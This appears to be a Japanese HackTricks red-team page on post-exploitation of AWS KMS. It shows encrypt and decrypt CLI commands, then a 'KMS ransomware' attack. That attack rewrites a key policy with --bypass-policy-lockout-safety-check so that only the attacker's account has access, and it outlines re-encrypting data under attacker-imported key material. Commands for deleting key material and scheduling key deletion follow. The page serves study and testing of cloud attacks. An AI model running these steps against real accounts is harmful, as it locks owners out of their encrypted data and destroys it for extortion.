AWS - KMS Post Exploitation

htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法:

KMS

詳細については、以下をチェックしてください:

pageAWS - KMS Enum

情報の暗号化/復号化

  • 対称キーを使用

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode
  • 非対称キーを使用する:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMSランサムウェア

KMSへの特権アクセスを持つ攻撃者は、キーのKMSポリシーを変更し、自分のアカウントにアクセス権限を付与して、正規のアカウントに付与されたアクセス権限を削除することができます。

その後、正規のアカウントのユーザーは、それらのキーで暗号化されたサービスの情報にアクセスできなくなり、アカウント上で簡単かつ効果的なランサムウェアが作成されます。

AWSが管理するキーはこの攻撃の影響を受けませんが、顧客管理キーは影響を受けます。

また、Webコンソールにこのオプションがないため、この攻撃はCLIからのみ可能であることに注意してください。必要なパラメータは --bypass-policy-lockout-safety-check です。

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

そのポリシーを変更して外部アカウントにのみアクセス権を与え、その外部アカウントから元のアカウントにアクセス権を戻す新しいポリシーを設定しようとしても、それはできません。

一般的なKMSランサムウェア

グローバルKMSランサムウェア

別の方法でグローバルKMSランサムウェアを実行する方法があります。これには次の手順が含まれます:

  • 攻撃者によってインポートされたキー素材を持つ新しいキーを作成します。

  • 以前のバージョンで暗号化された古いデータを新しいもので再暗号化します。

  • KMSキーを削除します。

  • 今後、元のキー素材を持つ攻撃者だけが暗号化されたデータを復号化できるようになります。

キーの破壊

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

AWSは今、クロスアカウントからの以前のアクションを防止しています。

htARTE(HackTricks AWS Red Team Expert)を使用して、ゼロからヒーローまでAWSハッキングを学びましょう!

HackTricksをサポートする他の方法:

最終更新